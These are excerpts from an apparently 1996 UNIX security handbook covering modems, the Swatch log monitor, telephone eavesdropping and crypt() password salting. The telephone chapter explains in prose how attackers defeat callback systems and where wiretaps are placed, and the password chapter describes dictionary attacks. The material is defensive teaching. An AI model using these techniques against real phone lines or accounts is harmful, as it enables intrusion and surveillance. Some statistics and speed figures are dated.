The RS-232 Serial Protocol<br />

Modems and <strong>Sec</strong>urity<br />

Modems and <strong>UNIX</strong><br />

Additional <strong>Sec</strong>urity for Modems<br />

A main function of modern computers is to enable communications - sending electronic mail, news<br />

bulletins, and documents across the office or around the world. After all, a computer by itself is really<br />

nothing more than an overgrown programmable calculator - a word processor with delusions of grandeur.<br />

But with a modem or a network interface, computers can "speak" and send information.<br />

A good communications infrastructure works both ways: not only does it let you get information out, it<br />

also lets you get back in to your computer when you're at home or out of town. If your computer is<br />

equipped with a modem that answers incoming telephone calls, you can dial up when you're sick or on<br />

vacation and read your electronic mail, keep informed with your online news services, or even work on a<br />

financial projection if the whim suddenly strikes you. You can almost believe that you never left the<br />

office in the first place!<br />

But in the world of computer security, good communications can be a double-edged sword.<br />

Communications equipment can aid attackers and saboteurs while it enables you to get information in<br />

and out easily. As with most areas of computer security, the way to protect yourself is not to shun the<br />

technology, but to embrace it carefully, making sure that it can't be turned against you.<br />

14.1 Modems: Theory of Operation<br />

Modems are devices that let computers transmit information over ordinary telephone lines. The word<br />

explains how the device works: modem is a contraction of "modulator/demodulator." Modems translate a

stream of information into a series of tones (modulating) at one end of the telephone line, and translate<br />

the tones back into the serial stream at the other end of the connection (demodulating). Most modems are<br />

bidirectional - every modem contains both a modulator and a demodulator, so a data transfer can take<br />

place in both directions simultaneously.<br />


Modems have a flexibility that is unparalleled by other communications technologies. Because modems<br />

work with standard telephone lines, and use the public telephone network to route their conversations,<br />

any computer that is equipped with a modem and a telephone line can communicate with any other<br />

computer that has a modem and a telephone line, anywhere in the world. Thus, even in this age of the<br />

Internet and local area networks, modems are still the single most common way that people access computers remotely. This trend is likely to continue into at least the near future, especially with the continuing popularity of specialized dial-up bulletin board systems (BBSs).

Early computer modems commonly operated at 110 or 300 baud, transmitting information at a rate of 10<br />

or 30 characters per second, respectively. Today, in 1996, few computer modems are sold that are not<br />

capable of 14,400 bits per second (bps), and modems that zip along at 28,800 bps are increasingly<br />

popular. Some modems that send data synchronously, with a precision clock, are capable of rates in<br />

excess of 100,000 bps. Special modems on digital ISDN lines are also capable of speeds in excess of<br />

100,000 bps. With data compression included, and new technology constantly being offered, we expect<br />

to see common modems with increasingly higher speeds (and smaller physical sizes) as time goes on.<br />

Baud and bps<br />

Baud is named after the 19th-century French inventor, J. M. E. Baudot. He invented a method of<br />

encoding letters and digits into bit patterns for transmission. A 5-bit descendent of his code is still used in<br />

today's TELEX systems.<br />

5 to 12 bits are required to transmit a "standard" character, depending on whether we make upper/lower<br />

case available, transmit check-bits, and so on. A multi-byte character code may require many times that<br />

for each character. The standard ISO 8859-1 character set requires eight bits per character, and simple<br />

ASCII requires seven bits. Computer data transmitted over a serial line usually consists of one start bit,<br />

seven or eight data bits, one parity or space bit, and one stop bit. The number of characters per second is<br />

thus usually equal to the number of bits per second divided by 10.<br />
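As a quick check of that rule of thumb, you can do the division for a 28,800-bps modem right at the shell prompt:

% expr 28800 / 10
2880

That is, roughly 2,880 characters per second.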

The word "baud[1]" refers to the number of audible tokens per second that are sent over the telephone<br />

line. On 110- and 300-bits-per-second (bps) modems, the baud rate equals the bps rate. On 1200-, 2400-,<br />

and higher-bps modems, a variety of audible encoding techniques are used to cram more information into<br />

each audible token. TDD phone devices for the deaf use a lower-speed modem than modern computers<br />

usually do.<br />

[1] The "baud" is not to be confused with the "bawd," which is the rate at which juveniles<br />

transmit risqué pictures over network connections.<br />


Chapter 10<br />

Auditing and Logging<br />

10.6 Swatch: A Log File Tool<br />

Swatch is a simple program written in the Perl programming language that is designed to monitor log files.<br />

It allows you to automatically scan log files for particular entries and then take appropriate action, such as<br />

sending you mail, printing a message on your screen, or running a program. There are a few other similar<br />

tools available, and we hope that more might be written in the near future, but we'll explain Swatch here as<br />

an example of how to automate monitoring of your log files. Swatch allows a great deal of flexibility,<br />

although it offers no debugging facility for complicated configuration and it has a temperamental<br />

configuration file syntax.<br />

Swatch was developed by E. Todd Atkins at Stanford's EE Computer Facility to automatically scan log<br />

files. Swatch is not currently included as standard software with any UNIX distribution, but it is available

via anonymous FTP from ftp://sierra.stanford.edu/swatch or ftp://coast.cs.purdue.edu/pub/tools/swatch.<br />

10.6.1 Running Swatch<br />

Swatch has two modes of operation. It can be run in batch mode, scanning a log file once according to a preset configuration. Alternatively, Swatch can monitor your log files in real time, examining lines as they are added.

Swatch is run from the command line:<br />

% swatch options input-source<br />

Swatch accepts a number of command-line options; the following are the ones that you will most likely use:

-c config_file<br />

Specifies a configuration file to use. By default, Swatch uses the file ~/.swatchrc, which probably<br />

isn't what you want to use. (You will probably want to use different configuration files for different<br />

log files.)<br />

-r restart_time<br />

Allows you to tell Swatch to restart itself after a certain amount of time. Time may be in the form<br />

hh:mm[am|pm] to specify an absolute time, or in the form +hh:mm, meaning a time hh hours and<br />

mm minutes in the future.<br />

The Swatch options given below allow you to change the separator that the program uses when interpreting<br />

its files. They are probably of limited use in most applications:<br />

-P pattern_separator<br />


Specifies the separator that Swatch uses when parsing the patterns in configuration file. By default,<br />

Swatch uses the comma (,) as the separator.<br />

-A action_separator<br />

Specifies the separator that Swatch will use when parsing the actions in the configuration file. By<br />

default, Swatch uses the comma (,) as the separator.<br />

-I input_separator<br />

Specifies the separator that Swatch will use to separate each input record of the input file. By default,<br />

Swatch uses the newline.<br />

The input source is specified by one of the following arguments:<br />

-f filename<br />

Specifies a file for Swatch to examine. Swatch will do a single pass through the file.<br />

-p program<br />

Specifies a program for Swatch to run and examine the results.<br />

-t filename<br />

Specifies a file for Swatch to examine on a continual basis. Swatch will examine each line of text as<br />

it is added.<br />
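For example, to watch the system log continuously with a configuration file written for it, you might start Swatch in the background like this (the file names are illustrative; on many systems the syslog output lands in a file such as /var/adm/messages):

% swatch -c /usr/local/etc/swatch.messages -t /var/adm/messages &

The -t option keeps Swatch running, examining each new line as it is appended to the log file.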

10.6.2 The Swatch Configuration File<br />

Swatch's operation is controlled by a configuration file. Each line of the file consists of four tab-delimited<br />

fields, and has the form:<br />

/pattern/[,/pattern/,...]   action[,action,...]   [[[HH:]MM:]SS]   [start:length]

The first field specifies a pattern which is scanned for on each line of the log file. The pattern is in the form<br />

of a Perl regular expression, which is similar to regular expressions used by egrep. If more than one pattern<br />

is specified, then a match on either pattern will signify a match.<br />

The second field specifies an action to be taken each time the pattern in the first field is matched. Swatch<br />

supports the following actions:<br />

echo[=mode]<br />

Prints the matched line. You can specify an optional mode, which may be either normal, bold,<br />

underscore, blink, or inverse.<br />

bell[=N]<br />

Prints the matched line and rings the bell. You can specify a number N to cause the bell to ring N<br />

times.<br />

exec=command<br />

Executes the specified command. If you specify $0 or $* in the configuration file, the symbol will be<br />

replaced by the entire line from the log file. If you specify $1, $2 or $N, the symbol will be replaced<br />


by the Nth field from the log file line.<br />

system=command<br />

Similar to the exec= action, except that Swatch will not process additional lines from the log file until<br />

the command has finished executing.<br />

ignore<br />

Ignores the matched line.<br />

mail[=address:address:...]<br />

Sends electronic mail to the specified address containing the matched line. If no address is specified,<br />

the mail will be sent to the user who is running the program.<br />

pipe=command<br />

Pipes the matched lines into the specified command.<br />

write[=user:user:...]<br />

Writes the matched lines on the user's terminal with the write command.<br />

The third and fourth fields are optional. They give you a technique for controlling identical lines which are<br />

sent to the log file. If you specify a time, then Swatch will not alert you for identical lines which are sent to<br />

the log file within the specified period of time. Instead, Swatch will merely notify you when the first line is<br />

triggered, and then again after the specified period of time has passed. The fourth field specifies the location (starting position and length) of the timestamp within each log file line.

For example, on one system, you may have a process which generates the following message repeatedly in<br />

the log file:<br />

Apr 3 01:01:00 next routed[9055]: bind: Bad file number<br />

Apr 3 02:01:00 next routed[9135]: bind: Bad file number<br />

Apr 3 03:01:00 next routed[9198]: bind: Bad file number<br />

Apr 3 04:01:00 next routed[9273]: bind: Bad file number<br />

You can catch the log file message with the following Swatch configuration line:<br />

/routed.*bind/ echo 24:00:00 0:16<br />

This line should cause Swatch to report the routed message only once a day, with the following message:

*** The following was seen 20 times in the last 24 hours(s):<br />

==> next routed[9273]: bind: Bad file number<br />

Be sure that you use the tab character to separate the fields in your configuration file. If you use spaces, you<br />

may get an error message like this:<br />

parse error in file /tmp/..swatch..2097 at line 24, next 2 tokens<br />

"/routed.*bind<br />

/ echo"<br />

parse error in file /tmp/..swatch..2097 at line 27, next token "}"<br />

Execution of /tmp/..swatch..2097 aborted due to compilation errors.<br />
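As a fuller illustration, here is a small configuration file that combines several of the actions described above. The patterns are invented examples, and the whitespace between the fields (shown here as spaces) must be actual tab characters:

/file system full/      echo=bold,bell=3
/panic|halt/            echo=inverse,mail
/su:/                   echo,write=operator
/sendmail.*stat=Sent/   ignore

The first line highlights disk-full messages and rings the bell three times; the second mails panic and halt messages to the user running Swatch; the third echoes su activity and writes it to the operator's terminal; the last discards routine sendmail delivery records.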





Chapter 14<br />

Telephone <strong>Sec</strong>urity<br />

14.4 Modems and <strong>Sec</strong>urity<br />

Modems raise a number of security concerns because they create links between your computer and the<br />

outside world. Modems can be used by individuals inside your organization to remove confidential<br />

information. Modems can be used by people outside your organization to gain unauthorized access to<br />

your computer. If your modems can be reprogrammed or otherwise subverted, they can be used to trick<br />

your users into revealing their passwords. And, finally, an attacker can eavesdrop on a modem<br />

communication.<br />

Today, modems remain a popular tool for breaking into large corporate networks. The reason is simple:<br />

while corporations closely monitor their network connections, modems are largely unguarded. In many<br />

organizations, there is no good way to prevent users from putting modems on their desktop computers<br />

and running "remote access" software.<br />

So what can be done? To maximize security, modems should be provided by the organization and<br />

administered in a secure fashion.<br />

The first step is to protect the modems themselves. Be sure they are located in a physically secure<br />

location, so that no unauthorized individual can access them. This protection is to prevent the modems<br />

from being altered or rewired. Some modems can have altered microcode or passwords loaded into them<br />

by someone with appropriate access, and you want to prevent such occurrences. You might make a note<br />

of the configuration switches (if any) on the modem, and periodically check them to be certain they<br />

remain unchanged.<br />

Many modems sold these days allow remote configuration and testing. This capability makes changes<br />

simpler for personnel who manage several remote locations. It also makes abusing your modems simpler<br />

for an attacker. Therefore, be certain that such features, if present in your modems, are disabled.<br />

The next most important aspect of protecting your modems is to protect their telephone numbers. Treat<br />

the telephone numbers for your modems the same as you treat your passwords: don't publicize them to<br />

anyone other than those who have a need to know. Making the telephone numbers for your modems<br />

widely known increases the chances that somebody might try to use them to break into your system.<br />

We'll describe some approaches in later sections.<br />

Unfortunately, you cannot keep the telephone numbers of your modems absolutely secret. After all,<br />

people do need to call them. And even if you were extremely careful with the numbers, an attacker could<br />

always discover the modem numbers by dialing every telephone number in your exchange. For this<br />

reason, simple secrecy isn't a solution; your modems need more stringent protection.[2]<br />


[2] You might think about changing your modem phone numbers on a yearly basis as a<br />

basic precaution.<br />

14.4.1 One-Way Phone Lines<br />

Most sites set up their modems and telephone lines so that they can both initiate and receive calls. Under<br />

older versions of <strong>UNIX</strong>, you could not use a modem for both purposes. Many vendors developed their<br />

own mechanisms to allow modems to be used bidirectionally.<br />

Having modems be able to initiate and receive calls may seem like an economical way to make the most<br />

use of your modems and phone lines. However, the feature introduces a variety of significant security<br />

risks:<br />

● Toll fraud can only be committed on telephone lines that can place outgoing calls. The more phones you have that can place such calls, the more time and effort you will need to spend to make sure that your outbound modem lines are properly configured.

● If phone lines can be used for either inbound or outbound calls, then you run the risk that your inbound callers will use up all of your phone lines and prevent anybody on your system from initiating an outgoing call. (You also run the risk that use of all of your lines for outbound calls may prevent people from dialing into your system.) By dedicating each telephone line to either inbound or outbound calls, you ensure that one use of the system will not preclude the other.

● If your modems are used for both inbound and outbound calls, an attacker can use this capability to subvert any callback systems (see the sidebar) that you may be employing.

Your system will therefore be more secure if you use separate modems for inbound and outbound traffic.<br />

You may further wish to routinely monitor the configuration of your telephone lines to check for the<br />

following conditions:<br />

● Check to make sure that telephone lines used only for inbound calls cannot place outbound calls.

● Check to make sure that telephone lines that are not used to call long-distance telephone numbers in fact cannot place long-distance telephone calls.

14.4.2 Subverting Callback

A callback scheme is one in which an outsider calls your machine, connects to the software, and provides<br />

some form of identification. The system then severs the connection and calls the outsider back at a<br />

predetermined phone number. This scheme enhances security because the system will dial only<br />

preauthorized numbers, so an attacker cannot get the system to initiate a connection to his or her modem.<br />

Unfortunately, callback can be subverted if the same modem that the outsider called is used to call the<br />

user back. Many phone systems, and especially some PBX systems, will not disconnect a call initiated<br />

from an outside line until the outside line is hung up.<br />


To subvert such a callback system, the attacker merely calls the "callback modem" and then does not<br />

hang up when the modem attempts to sever the connection. The modem tries to hang up, then picks the<br />

phone back up and tries to dial out. The attacker's modem is then set to answer the callback modem, and<br />

the system is subverted. This type of attack can also be performed on systems that are not using a<br />

callback, but are doing normal dialout operations. For example, the attack can be used to intercept<br />

messages that are sent over a UUCP connection; the attacker merely configures a computer system to<br />

have the same name and UUCP login account as the system that is being called.<br />

Some callback systems attempt to get around this problem by waiting for a dial tone. Unfortunately,<br />

these modems can be fooled by an attacker who simply plays a recording of a dial tone over the open<br />

line.<br />

The only way to foil an attacker who is attempting this kind of trick is to have two sets of modems - one<br />

set for dialing in, and one set for dialing out. To make this work, you should have the telephone company<br />

install the lines so that the incoming lines cannot be used to dial out, and the outgoing lines have no<br />

telephone number for dialing in. This setup costs more than a regular line, but adds an extra measure of<br />

security for your phone connections.<br />

Note that even with these precautions, there are other ways to subvert a callback. For example, someone

could install call-forwarding on the called-back number and reroute the call through the switches at the<br />

phone company. Callback schemes can enhance your system's overall security, but you should not<br />

depend on them as your only means of protection.<br />

14.4.3 Caller-ID (CNID)<br />

In many areas, you can purchase an additional telephone service called Caller-ID. As its name implies,<br />

Caller-ID identifies the phone number of each incoming telephone call. The phone number is usually<br />

displayed on a small box next to the telephone when the phone starts ringing. (Note that this feature may<br />

not be available to you if you own your own PBX or switch.)<br />

The telephone company sells Caller-ID on the virtues of its privacy and security: by knowing the phone<br />

number of an incoming call, you can make the decision as to whether or not you wish to answer it.<br />

Caller-ID can also be used with computers. Several modem makers now support Caller-ID directly. With<br />

one of these modems, you can program the modem to send the telephone number of the calling<br />

instrument to the computer. You can then write custom software to limit incoming calls to a specified list<br />

of phone numbers, or to only allow certain users to use certain phones.<br />
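As a rough sketch of the first idea, the following program checks a caller's number against a file of permitted numbers, one per line. It assumes that some other piece of software has already extracted the calling number from the modem's Caller-ID report (report formats vary from modem to modem), and the file name shown is only an example:

#include <stdio.h>
#include <string.h>

/* Return 1 if the number appears in the allow file, 0 otherwise. */
int caller_allowed(const char *number)
{
    FILE *fp = fopen("/usr/local/etc/modem.allow", "r");   /* example path */
    char line[64];
    int ok = 0;

    if (fp == NULL)
        return 0;                         /* fail closed if the list is missing */
    while (fgets(line, sizeof(line), fp) != NULL) {
        line[strcspn(line, "\n")] = '\0'; /* strip the trailing newline */
        if (strcmp(line, number) == 0) {
            ok = 1;
            break;
        }
    }
    fclose(fp);
    return ok;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: checkcaller phone-number\n");
        return 2;
    }
    return caller_allowed(argv[1]) ? 0 : 1;
}

A wrapper built around a check like this could drop the line (for example, by lowering DTR on the serial port) whenever the exit status is nonzero.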

The telephone company's Integrated Services Digital Network (ISDN[3]) digital phone service also<br />

provides the phone number of the caller through a similar service called Automatic Number<br />

Identification (ANI). This service is available to many corporate 800-number subscribers. ISDN offers<br />

yet another service called Restricted Calling Groups, which allows you to specify a list of phone numbers<br />

that are allowed to call your telephone number. All other callers are blocked.<br />

[3] In many areas of the country, ISDN still stands for "Interesting Services Doing<br />

Nothing."<br />

Advanced telephone services such as these are only as secure as the underlying telephone network<br />

infrastructure: if an attacker managed to break into the telephone company's computers, that attacker<br />


could reprogram them to display incorrect numbers on the Caller-ID display, or to bypass Restricted<br />

Calling Groups. Although there are no officially acknowledged cases of such attacks, the possibility<br />

exists, and many credible but "informal" accounts of such incidents have been recounted.<br />

14.4.4 Protecting Against Eavesdropping<br />

Modems that are not adaptive are very susceptible to eavesdropping and wiretapping. Non-adaptive<br />

modems include data modems that are slower than 9600 baud and most fax modems. The conversations<br />

between these modems can be recorded with a high-quality audio tape and played into a matching unit at<br />

a later point in time, or the telephone line can simply be bridged and fed into a separate surveillance<br />

modem. Cellular telephone modems are even easier to tap, as their communications are broadcast and<br />

readily intercepted by anyone.<br />

Adaptive modems are less susceptible to eavesdropping with ordinary equipment, although even their<br />

communications may be intercepted using moderately sophisticated techniques.<br />

How common is electronic eavesdropping? No one can say with certainty. As Whitfield Diffie points<br />

out, for electronic eavesdropping to be effective, the target must be unaware of its existence or take no<br />

precautions. Unfortunately, such a scenario is often the case.<br />

14.4.4.1 Kinds of eavesdropping<br />

There are basically four different places where a telephone conversation can be tapped:<br />

● At your premises. Using a remote extension, an attacker can place a second telephone or a tape recorder in parallel with your existing instruments. Accessible wiring closets with standard punch-down blocks for phone routing make such interception trivial to accomplish and difficult to locate by simple inspection. An inductive tap can also be used, and this requires no alteration to the wiring.

● On the wire between your premises and the central office. An attacker can splice monitoring equipment along the wire that gives you telephone service. In many cities, especially older ones, many splices already exist, and a simple pair of wires can literally go all over town and into other people's homes and offices without anybody's knowledge.

● At the phone company's central office. A tap can be placed on your line by employees at the telephone company, operating in either an official or an unofficial capacity. If the tap is programmed into the telephone switch itself, it may be almost impossible to detect its presence.[4] Hackers who penetrate the phone switches can also install taps in this manner (and, allegedly, have done so).

[4] Under the terms of the 1994 Communications Assistance to Law Enforcement Act (formerly called the Digital Telephony Act), telephone providers have a legal obligation to make it impossible to detect a lawfully ordered wiretap.

● Along a wireless transmission link. If your telephone call is routed over a satellite or a microwave link, a skillful attacker can intercept and decode that radio transmission.

Who might be tapping your telephone lines? Here are some possibilities:<br />


● A spouse or coworker. A surprising amount of covert monitoring takes place in the home or office by those we trust. Sometimes the monitoring is harmless or playful; other times, there are sinister motives.

● Industrial spies. A tap may be placed by a spy or a business competitor seeking proprietary corporate information. According to Current and Future Danger, a 1995 publication by the Computer Security Institute, the monthly theft of proprietary data increased 260% from 1988 to 1993, and over 30% of those cases included foreign involvement. As almost 75% of businesses have some proprietary information of significant competitive value, the potential for such losses should be a concern.

● Law enforcement. In 1994, U.S. law enforcement officials obtained court orders to conduct 1,154 wiretaps, according to the Administrative Office of the United States Courts. A large majority of those intercepts, 76%, were the result of ongoing drug investigations. Wiretaps are also used to conduct investigations in terrorism, white-collar crime, and organized crime.

Law enforcement agents may also conduct illegal wiretaps - wiretaps for which the officers have no warrant. Although information obtained from such a wiretap cannot be used in court as evidence, it can be used to obtain a legal wiretap or even a search warrant. (In the late 1980s and early 1990s, there was an explosion in the use of unnamed, paid informants by law enforcement agencies in the United States.) Information could also be used for extralegal purposes, such as threats, intimidation, or blackmail.

14.4.4.2 Protection against eavesdropping<br />

There are several measures that you can take against electronic eavesdropping, with varying degrees of<br />

effectiveness:<br />

● Visually inspect your telephone line. Look for spliced wires, taps, or boxes that you cannot understand. Most eavesdropping by people who are not professionals is very easy to detect.

● Have your telephone line electronically "swept." Using a device called a signal reflectometer, a trained technician can electronically detect any splices or junctions on your telephone line. Junctions may or may not be evidence of taps; in some sections of the country, many telephone pairs have multiple arms that take them into several different neighborhoods. If you do choose to sweep your line, you should do so on a regular basis. Detecting a change in a telephone line that has been watched over time is easier than looking at a line one time only and determining if the line has a tap on it.

Sweeping may not detect certain kinds of taps, such as digital taps conducted by the telephone company for law enforcement agencies or other organizations, nor will it detect inductive taps.

● Use cryptography. A few years ago, cryptographic telephones or modems cost more than $1,000 and were only available to certain purchasers. Today, there are devices costing less than $300 that fit between a


computer and a modem and create a cryptographically secure line. Most of these systems are based<br />

on private key cryptography and require that the system operator distribute a different key to each<br />

user. In practice, such restrictions pose no problem for most organizations. But there is also a<br />

growing number of public key systems, which offer simple-to-use security that is still of the<br />

highest caliber. There are also many affordable modems that include built-in encryption and which<br />

require no special unit to work.<br />




Chapter 8<br />

Defending Your Accounts<br />

8.6 The <strong>UNIX</strong> Encrypted Password System<br />

When <strong>UNIX</strong> requests your password, it needs some way of determining that the password you type is the<br />

correct one. Many early computer systems (and quite a few still around today!) kept the passwords for all<br />

of their accounts plainly visible in a so-called "password file" that really contained the passwords. Under<br />

normal circumstances, the system protected the passwords so that they could be accessed only by<br />

privileged users and operating system utilities. But through accident, programming error, or deliberate<br />

act, the contents of the password file almost invariably become available to unprivileged users. This<br />

scenario is illustrated in the following remembrance:<br />

Perhaps the most memorable such occasion occurred in the early 1960s when a system<br />

administrator on the CTSS system at MIT was editing the password file and another system<br />

administrator was editing the daily message that is printed on everyone's terminal on login.<br />

Due to a software design error, the temporary editor files of the two users were interchanged<br />

and thus, for a time, the password file was printed on every terminal when it was logged in.<br />

- Robert Morris and Ken Thompson, Password <strong>Sec</strong>urity: A Case History<br />

The real danger posed by such systems, wrote Morris and Thompson, is not that software problems will<br />

cause a recurrence of this event, but that people can make copies of the password file and purloin them<br />

without the knowledge of the system administrator. For example, if the password file is saved on backup<br />

tapes, then those backups must be kept in a physically secure place. If a backup tape is stolen, then<br />

everybody's password must be changed.<br />

<strong>UNIX</strong> avoids this problem by not keeping actual passwords anywhere on the system. Instead, <strong>UNIX</strong><br />

stores a value that is generated by using the password to encrypt a block of zero bits with a one-way<br />

function called crypt(); the result of the calculation is (usually) stored in the file /etc/passwd. When you try to log in, the program /bin/login does not actually decrypt your password. Instead, /bin/login takes

the password that you typed, uses it to transform another block of zeros, and compares the newly<br />

transformed block with the block stored in the /etc/passwd file. If the two encrypted results match, the<br />

system lets you in.<br />
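A minimal sketch of this check, using the standard crypt(3) library routine, looks like the following. (Error handling is pared down, and on systems that use shadow passwords the encrypted string must be read from the shadow file rather than /etc/passwd.)

#include <stdio.h>
#include <string.h>
#include <pwd.h>
#include <unistd.h>   /* crypt() and getpass(); some systems declare crypt()
                         in <crypt.h> and require linking with -lcrypt */

/* Return 1 if "typed" is the correct password for "user", 0 otherwise. */
int check_password(const char *user, const char *typed)
{
    struct passwd *pw = getpwnam(user);
    char *result;

    if (pw == NULL)
        return 0;
    /* crypt() uses only the first two characters of its second argument as
       the salt, so the stored encrypted password can be passed directly. */
    result = crypt(typed, pw->pw_passwd);
    return result != NULL && strcmp(result, pw->pw_passwd) == 0;
}

int main(int argc, char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "usage: checkpw username\n");
        return 2;
    }
    if (check_password(argv[1], getpass("Password: ")))
        printf("Password is correct.\n");
    else
        printf("Password is incorrect.\n");
    return 0;
}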

The security of this approach rests upon the strength of the encryption algorithm and the difficulty of<br />

guessing the user's password. To date, the crypt () algorithm has proven highly resistant to attacks.<br />

Unfortunately, users have a habit of picking easy-to-guess passwords (see <strong>Sec</strong>tion 3.6.1, "Bad<br />

Passwords: Open Doors"), which creates the need for shadow password files.<br />

NOTE: Don't confuse the crypt ( ) algorithm with the crypt encryption program. The crypt<br />


program uses a different encryption system from crypt ( ) and is very easy to break. See<br />

Chapter 6, Cryptography, for more details.<br />

8.6.1 The crypt() Algorithm<br />

The algorithm that crypt ( ) uses is based on the Data Encryption Standard (DES) of the National Institute<br />

of Standards and Technology (NIST). In normal operation, DES uses a 56-bit key (eight 7-bit ASCII<br />

characters, for instance) to encrypt blocks of original text, or clear text, that are 64 bits in length. The<br />

resulting 64-bit blocks of encrypted text, or ciphertext, cannot easily be decrypted to the original clear<br />

text without knowing the original 56-bit key.<br />

The <strong>UNIX</strong> crypt ( ) function takes the user's password as the encryption key and uses it to encrypt a<br />

64-bit block of zeros. The resulting 64-bit block of cipher text is then encrypted again with the user's<br />

password; the process is repeated a total of 25 times. The final 64 bits are unpacked into a string of 11<br />

printable characters that are stored in the /etc/passwd file.[8]<br />

[8] Each of the 11 characters holds six bits of the result, represented as one of 64 characters<br />

in the set ".", "/", 0-9, A-Z, a-z, in that order. Thus, the value 0 is represented as ".", and 32<br />

is the letter "U".<br />
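The encoding described in this footnote can be written as a one-line table lookup; this is only an illustration of the mapping, not the actual library source:

/* Map a 6-bit value (0-63) to the character set used in encrypted
 * passwords: ".", "/", "0"-"9", "A"-"Z", "a"-"z", in that order. */
char to64(int v)
{
    static const char chars[] =
        "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    return chars[v & 0x3f];
}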

Although the source code to crypt ( ) is readily available, no technique has been discovered (and<br />

publicized) to translate the encrypted password back into the original password. Such reverse translation<br />

may not even be possible. As a result, the only known way to defeat <strong>UNIX</strong> password security is via a<br />

brute-force attack (see the note below), or by a dictionary attack. A dictionary attack is conducted by<br />

choosing likely passwords, as from a dictionary, encrypting them, and comparing the results with the<br />

value stored in /etc/passwd. This approach to breaking a cryptographic cipher is also called a key search<br />

or password cracking.<br />

Robert Morris and Ken Thompson designed crypt ( ) to make a key search computationally expensive,<br />

and therefore too difficult to be successful. At the time, software implementations of DES were usually<br />

slow; iterating the encryption process 25 times made the process of encrypting a single password 25<br />

times slower still. On the original PDP-11 processors, upon which <strong>UNIX</strong> was designed, nearly a full<br />

second of computer time was required to encrypt a single password. To eliminate the possibility of using<br />

DES hardware encryption chips, which were a thousand times faster than software running on a PDP-11,<br />

Morris and Thompson modified the DES tables used by their software implementation, rendering the two<br />

incompatible. The same modification also served to prevent a bad guy from simply pre-encrypting an<br />

entire dictionary and storing it.<br />

What was the modification? Morris and Thompson added a bit of salt, as we'll describe below.<br />

NOTE: There is no published or known method to easily decrypt DES-encrypted text<br />

without knowing the key.[9] However, there have been many advances in hardware design<br />

since the DES was developed. Although there is no known software algorithm to "break" the<br />

encryption, you can build a highly parallel, special-purpose DES decryption engine that can<br />

try all possible keys in a matter of hours.<br />

The cost of such a machine is estimated at several millions of dollars. It would work by<br />

using a brute-force attack of trying all possible keys until intelligible text is produced.<br />


Several million dollars is well within the budget of most governments, and a significant<br />

number of large corporations. A similar machine for finding <strong>UNIX</strong> passwords is feasible.<br />

Thus, passwords should not be considered as completely "unbreakable."<br />

8.6.2 What Is Salt?<br />

As table salt adds zest to popcorn, the salt that Morris and Thompson sprinkled into the DES algorithm<br />

added a little more spice and variety. The DES salt is a 12-bit number, between 0 and 4095, which<br />

slightly changes the result of the DES function. Each of the 4096 different salts makes a password<br />

encrypt a different way.<br />

When you change your password, the /bin/passwd program selects a salt based on the time of day. The<br />

salt is converted into a two-character string and is stored in the /etc/passwd file along with the encrypted<br />

"password."[10] In this manner, when you type your password at login time, the same salt is used again.<br />

<strong>UNIX</strong> stores the salt as the first two characters of the encrypted password.<br />

[10] By now, you know that what is stored in the /etc/passwd file is not really the encrypted<br />

password. However, everyone calls it that, and we will do the same from here on.<br />

Otherwise, we'll need to keep typing "the superencrypted block of zeros that is used to<br />

verify the user's password" everywhere in the book, filling many extra pages and<br />

contributing to the premature demise of yet more trees.<br />

Table 8.2 shows how a few different words encrypt with different salts.<br />

Table 8.2: Passwords and Salts<br />

Password Salt Encrypted Password<br />

nutmeg Mi MiqkFWCm1fNJI<br />

ellen1 ri ri79KNd7V6.Sk<br />

Sharon ./ ./2aN7ysff3qM<br />

norahs am amfIADT2iqjAf<br />

norahs 7a 7azfT5tIdyh0I<br />

Notice that the last password, norahs, was encrypted two different ways with two different salts.<br />
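Assuming the traditional DES-based crypt() on your system, you can reproduce those last two table entries with a few lines of C:

#include <stdio.h>
#include <unistd.h>   /* crypt(); some systems use <crypt.h> and -lcrypt */

int main(void)
{
    /* The same password encrypted under two different salts, as in Table 8.2 */
    printf("%s\n", crypt("norahs", "am"));   /* prints amfIADT2iqjAf */
    printf("%s\n", crypt("norahs", "7a"));   /* prints 7azfT5tIdyh0I */
    return 0;
}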

Having a salt means that the same password can encrypt in 4096 different ways. This makes it much<br />

harder for an attacker to build a reverse dictionary for translating encrypted passwords back into their

unencrypted form: to build a reverse dictionary of 100,000 words, an attacker would need to have<br />

409,600,000 entries. As a side effect, the salt makes it possible for a user to have the same password on a<br />

number of different computers and to keep this fact a secret (usually), even from somebody who has<br />

access to the /etc/passwd files on all of those computers; two systems would not likely assign the same<br />

salt to the user, thus ensuring that the encrypted password field is different.[11]<br />

[11] This case occurs only when the user actually types in his or her password on the second<br />

computer. Unfortunately, in practice system administrators commonly cut and paste<br />

/etc/passwd entries from one computer to another when they build accounts for users on new<br />

computers. As a result, others can easily tell when a user has the same password on more<br />

than one system.<br />


8.6.3 What the Salt Doesn't Do<br />

Unfortunately, salt is not a cure-all. Although it makes the attacker's job of building a database of all<br />

encrypted passwords more difficult, it doesn't increase the amount of time required to search for a single<br />

user's password.<br />

Another problem with the salt is that it is limited, by design, to one of 4096 different possibilities. In the<br />

20 years since passwords have been salted, computers have become faster, hard disks have become<br />

bigger, and you can now put 4, 10, or even 20 gigabytes of information onto a single tape drive. As a<br />

result, password files have become once again a point of vulnerability, and <strong>UNIX</strong> vendors are<br />

increasingly turning to shadow password files and other techniques to fight password-guessing attacks.<br />

Yet another problem is that the salt is selected based on the time of day, which makes some salts more<br />

likely than others.<br />

8.6.4 Crypt16() and Other Algorithms<br />

Some UNIX operating systems, such as HP-UX, Ultrix, and BSD 4.4, can be configured to use a different crypt() system library that uses 16 or more significant characters in each password. The algorithm may also use a significantly larger salt. This algorithm is often referred to as bigcrypt() or crypt16(). You

should check your user documentation to see if this algorithm is an option available on your system. If<br />

so, you should consider using it. The advantage is that these systems will have more secure passwords.<br />

The disadvantage is that the encrypted passwords on these systems will not be compatible with the<br />

encrypted passwords on other systems.<br />




Chapter 17<br />

17. TCP/IP Services<br />

Contents:<br />

Understanding <strong>UNIX</strong> <strong>Internet</strong> Servers<br />

Controlling Access to Servers<br />

Primary <strong>UNIX</strong> Network Services<br />

<strong>Sec</strong>urity Implications of Network Services<br />

Monitoring Your Network with netstat<br />

Network Scanning<br />

Summary<br />

Connecting a <strong>UNIX</strong> computer to the <strong>Internet</strong> is not an action that should be taken lightly. Although the<br />

